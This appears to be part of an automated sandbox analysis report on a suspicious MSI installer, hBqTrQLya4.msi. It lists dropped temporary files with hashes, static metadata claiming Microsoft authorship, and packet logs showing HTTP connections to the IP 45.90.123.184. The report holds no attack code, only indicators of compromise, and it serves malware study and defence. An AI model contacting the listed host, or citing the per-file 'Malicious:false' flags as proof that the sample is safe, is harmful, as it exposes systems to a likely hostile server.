                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DF76E21A88256C886C.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DFA22C13465D153DE4.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.500686578197496
                                                                    Encrypted:false
                                                                    SSDEEP:48:i8PhQuRc06WXJMjT5LYHTQIIS+IKAE+lCyjMHMOIIS+IATk:NhQ1vjTuHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:4F3F06645AAF82E11FEC7D7316D9F1B1
                                                                    SHA1:2A4403CECFC6565C09C35D271738350B492ED1D6
                                                                    SHA-256:25538D9E15D5031309229C46D81181B48A624F82F0FD8F2989647747C8FEE6D9
                                                                    SHA-512:BBBEE804E9C990C00FB1DF146AD08E0BA55A5EA68AB8C876307BC0F7C22731DCB6B4CA6E5D29AD507DBF8DAD3DBA895E39752A80E28C84C7210DE7E03776F52C
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DFC641A86073DBAADC.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DFC99FF7FE35E1FB6D.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):0.07141373846089161
                                                                    Encrypted:false
                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOyDURetVZphQ1gVky6lit/:2F0i8n0itFzDHFyIRetVZMBit/
                                                                    MD5:2763C11149673C16DFF38A4E5A16FD4D
                                                                    SHA1:293641CA7B988592321DDF694D02BB7F6F18E8CA
                                                                    SHA-256:6EB33F09D3B24A471F66F9BCF048A86E2CD819CA04FA10A903577CDE39D7E99A
                                                                    SHA-512:A5AE65C012A15C2DC701D464542F9B224777012C2426E4F4BCAA94CCA7DD5D4DAD11386F4494A3EF000112C04943AF3EB54710AF805F52247DC7DD02287D59ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DFD95C46A178374429.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\Temp\~DFF333C67804AFA111.TMP

                                                                    Download File
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):32768
                                                                    Entropy (8bit):1.2073133061787735
                                                                    Encrypted:false
                                                                    SSDEEP:48:7nYu2I+CFXJnT5ZYHTQIIS+IKAE+lCyjMHMOIIS+IATk:zYq/TYHTQIIrIRZlC0MsOIIrIV
                                                                    MD5:6EE82AF99BA5BCD65B2C4B2DBC883083
                                                                    SHA1:CA03795DF2E945B7916C393FAE3C6EB05E2A0A15
                                                                    SHA-256:95905231CC1A8DA5CA197C4917584020FE243A28D741806986AF7A4D18A3AFBA
                                                                    SHA-512:44AD7053B619F70853700D1EFFF6A5644859092A6050E05B1919D8406FD503CBF43E868CCA2FB9B6590D1F27285F4B27B70ED4BF4F6AC62C80F4933A90BF21C3
                                                                    Malicious:false
                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Chrome Cache Entry: 82

                                                                    Download File
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):275
                                                                    Entropy (8bit):5.251163667625441
                                                                    Encrypted:false
                                                                    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIR+knLd+wcXaoD:J0+oxBeRmR9etdzRxGezH0qjma+
                                                                    MD5:C40BF35CDBDC002FC8EB9CA79EFC9036
                                                                    SHA1:C0783FB3A5EA64B02977E8F584AA9B4DA361CC09
                                                                    SHA-256:FEB09AF0A64CF3CAD72182A02A29A666140E4B64E7BE23513F005062DE362A00
                                                                    SHA-512:AE091EB7F451675530080276932403CDE15462C75D70085184FE5DDE942A555904360240BDD30D23A8E0359ECE516DE9DE0C465AB253C8ED3F3E968E50272796
                                                                    Malicious:false
                                                                    URL:http://45.90.123.184/favicon.ico
                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address>.</body></html>.

                                                                    Static File Info

                                                                    General

                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {32FF458D-4EB8-49EA-9D5C-9471CB31AE21}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Jun 9 21:40:35 2024, Number of Pages: 200
                                                                    Entropy (8bit):7.9796246302652145
                                                                    TrID:
                                                                    • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                    • Microsoft Windows Installer (60509/1) 46.00%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                    File name:hBqTrQLya4.msi
                                                                    File size:31'124'992 bytes
                                                                    MD5:5421cd4bbb277efc5b163a75cac629ff
                                                                    SHA1:0d20c0bb978dad6bbd9065ebfc20680c241ac1e0
                                                                    SHA256:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7
                                                                    SHA512:c8446d76f4ec65bc3d6a3174407f88e377c8aa260ccbed083653d114271a81a91f166a7ab45ca3d1cbdf9917f8b5aebe87364da210b9160607f2fe59a76d893c
                                                                    SSDEEP:786432:Ln1stHfbfy4zTE8R0BPtNg1LfjlszEJZ:GHfO4zTB8qF+zEJZ
                                                                    TLSH:F9673325B38BC232D95D0276ED65FE2E0479FEA3473001D7B3E5796E88B18C11676A83
                                                                    File Content Preview:........................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X..............................................................................................

                                                                    File Icon

                                                                    Icon Hash:2d2e3797b32b2b99

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 4, 2024 09:13:02.271785021 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:02.584104061 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:03.193296909 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:04.396430969 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:04.693345070 CEST49674443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:04.696674109 CEST49675443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:04.755840063 CEST49672443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:06.802700996 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:10.820626020 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:11.193347931 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:11.615242004 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:11.943345070 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:13.443437099 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:14.302737951 CEST49675443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:14.302741051 CEST49674443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:14.458970070 CEST49672443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:16.505856991 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:16.931978941 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:16.933156013 CEST4970380192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:16.936795950 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:16.936863899 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:16.937910080 CEST804970345.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:16.937974930 CEST4970380192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:17.167999983 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:17.172849894 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:17.631432056 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:17.702599049 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:17.750442982 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:17.755593061 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:17.945689917 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:18.102313042 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:18.235829115 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:18.240844965 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:18.457103968 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:18.504698038 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:21.177022934 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.177097082 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.177160025 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.187824011 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.187843084 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.256779909 CEST49671443192.168.2.7204.79.197.203
                                                                    Jul 4, 2024 09:13:21.866579056 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.879156113 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.879172087 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.880229950 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.880431890 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.881711960 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.881789923 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:21.944118023 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:21.944127083 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:22.053587914 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:22.103101015 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:22.103132010 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:22.103368044 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:22.104912996 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:22.104923010 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:22.506597996 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:22.758142948 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:22.758236885 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:22.827362061 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:22.827378988 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:22.827725887 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.001243114 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:23.108735085 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:23.152515888 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.293217897 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.293495893 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.293550014 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:23.350747108 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:23.350776911 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.350788116 CEST49713443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:23.350796938 CEST443497132.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:23.462645054 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:23.462919950 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:25.436665058 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:25.436717987 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:25.440908909 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:25.441086054 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:25.441096067 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.084521055 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.084650993 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.186167002 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.186182976 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.186558962 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.187727928 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.232508898 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.373096943 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.373189926 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.376931906 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.823926926 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.823926926 CEST49714443192.168.2.72.19.104.72
                                                                    Jul 4, 2024 09:13:26.823956013 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:26.823966026 CEST443497142.19.104.72192.168.2.7
                                                                    Jul 4, 2024 09:13:29.717602968 CEST4970280192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:13:29.722524881 CEST804970245.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:13:31.776055098 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:31.776120901 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:31.776304960 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:34.505773067 CEST49677443192.168.2.720.50.201.200
                                                                    Jul 4, 2024 09:13:34.917325020 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:34.917362928 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:34.917448044 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:34.918683052 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:34.918699026 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:35.676695108 CEST49712443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:13:35.676724911 CEST44349712142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:13:35.723547935 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:35.723625898 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:35.897603035 CEST49701443192.168.2.7104.98.116.138
                                                                    Jul 4, 2024 09:13:35.900407076 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:35.900430918 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:35.900747061 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:35.902517080 CEST44349701104.98.116.138192.168.2.7
                                                                    Jul 4, 2024 09:13:36.053020000 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.291672945 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.332509041 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557187080 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557219028 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557228088 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557248116 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557257891 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557260990 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557271004 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.557293892 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557311058 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.557349920 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.557818890 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557826996 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.557899952 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:37.557907104 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.558214903 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:37.558263063 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:38.587445021 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:38.587486982 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:13:38.587498903 CEST49715443192.168.2.740.68.123.157
                                                                    Jul 4, 2024 09:13:38.587506056 CEST4434971540.68.123.157192.168.2.7
                                                                    Jul 4, 2024 09:14:01.945453882 CEST4970380192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:14:01.950304031 CEST804970345.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:14:09.096734047 CEST804970345.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:14:09.096790075 CEST4970380192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:14:10.195489883 CEST4970380192.168.2.745.90.123.184
                                                                    Jul 4, 2024 09:14:10.201065063 CEST804970345.90.123.184192.168.2.7
                                                                    Jul 4, 2024 09:14:19.178488016 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:19.178534031 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:19.178601980 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:19.178922892 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:19.178936958 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:19.872009039 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:19.872102976 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:19.874769926 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:19.874779940 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:19.875076056 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:19.927958012 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.536623001 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.580504894 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766525030 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766556025 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766565084 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766580105 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766587973 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766594887 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766616106 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.766629934 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.766676903 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.767834902 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.767884970 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.767909050 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.767915964 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.767946005 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:20.768290997 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:20.768337965 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:21.226216078 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:21.226267099 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.226363897 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:21.226603031 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:21.226624012 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.401186943 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:21.401221991 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:21.401237011 CEST49720443192.168.2.752.165.165.26
                                                                    Jul 4, 2024 09:14:21.401243925 CEST4434972052.165.165.26192.168.2.7
                                                                    Jul 4, 2024 09:14:21.874496937 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.874902964 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:21.874929905 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.875252008 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.876671076 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:21.876739025 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:21.926924944 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:31.826903105 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:31.826982975 CEST44349723142.250.186.132192.168.2.7
                                                                    Jul 4, 2024 09:14:31.827039957 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:32.205214024 CEST49723443192.168.2.7142.250.186.132
                                                                    Jul 4, 2024 09:14:32.205251932 CEST44349723142.250.186.132192.168.2.7

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 4, 2024 09:13:15.636626005 CEST123123192.168.2.751.145.123.29
                                                                    Jul 4, 2024 09:13:16.185798883 CEST12312351.145.123.29192.168.2.7
                                                                    Jul 4, 2024 09:13:16.938446045 CEST53552141.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:17.158638954 CEST53596151.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:17.183974028 CEST123123192.168.2.751.145.123.29
                                                                    Jul 4, 2024 09:13:17.356216908 CEST12312351.145.123.29192.168.2.7
                                                                    Jul 4, 2024 09:13:18.180440903 CEST53605991.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:21.168617964 CEST6296853192.168.2.71.1.1.1
                                                                    Jul 4, 2024 09:13:21.169058084 CEST6255253192.168.2.71.1.1.1
                                                                    Jul 4, 2024 09:13:21.175471067 CEST53629681.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:21.175813913 CEST53625521.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:35.684933901 CEST53530001.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:13:54.640542984 CEST53589431.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:14:11.309289932 CEST138138192.168.2.7192.168.2.255
                                                                    Jul 4, 2024 09:14:16.729326963 CEST53625581.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:14:17.030606031 CEST53512551.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:14:44.955219984 CEST53540121.1.1.1192.168.2.7
                                                                    Jul 4, 2024 09:15:29.965734959 CEST53551991.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jul 4, 2024 09:13:21.168617964 CEST192.168.2.71.1.1.10xedb3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Jul 4, 2024 09:13:21.169058084 CEST192.168.2.71.1.1.10x25f7Standard query (0)www.google.com65IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jul 4, 2024 09:13:21.175471067 CEST1.1.1.1192.168.2.70xedb3No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                    Jul 4, 2024 09:13:21.175813913 CEST1.1.1.1192.168.2.70x25f7No error (0)www.google.com65IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • fs.microsoft.com
                                                                    • slscr.update.microsoft.com
                                                                    • 45.90.123.184

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.74970245.90.123.184808024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
